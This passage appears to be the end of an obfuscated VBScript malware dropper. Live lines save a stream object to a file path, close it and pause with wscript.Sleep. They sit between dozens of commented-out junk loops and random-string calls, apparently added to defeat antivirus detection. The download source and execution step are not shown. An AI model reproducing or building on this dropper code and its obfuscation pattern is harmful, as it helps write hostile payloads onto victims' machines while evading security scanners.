'yDHFulBuhTW = Trim("rChjHLpbmtRzfhxLPbEJIcZSuLoAxPcyjdVhdNFhc")
'Next
'Next
'lumhVHsxJShhFGQn = lumhVHsxJShhFGQn + 19
'End if
'wDZyILhhqsHCo = wDZyILhhqsHCo + 7
'End if

    XMUkKbwtKbWtGwiCAEmROF.Position = 0
	 
'for vicNuVvGxlJDkOBMeMfKooni = 35 to 195
'tKawTkzLIFhLjBs = Trim("PDTdVZYFuhULHuunALUKdBJsbJUAuKmkfBYeHPoBYNqSrxx")
'Next

    XMUkKbwtKbWtGwiCAEmROF.SaveToFile (JneRTuQ)
	 
'for yJFfhrKkgNcwBCHXHR = 17 to 277
'QBPPJlLtCDaYzWnMZpEyO = Trim("YuWlNDTtMV")
'Next

    XMUkKbwtKbWtGwiCAEmROF.Close
	 
'for dfuKcQ = 54 to 224
'yujRxX = RTrim("qssMMTCggvTIxZcyUJNCnsrMBWVIxRDIdxpTlsrJdOehwv")
'Next

    wscript.Sleep 5360
	 
'Beooy = Len("yqREhBLjfPomQAkyFAxG")

   End if
    
'GZnchNrbolaxyq = Len("xGhPDfkWoQzhofmM")

End Sub



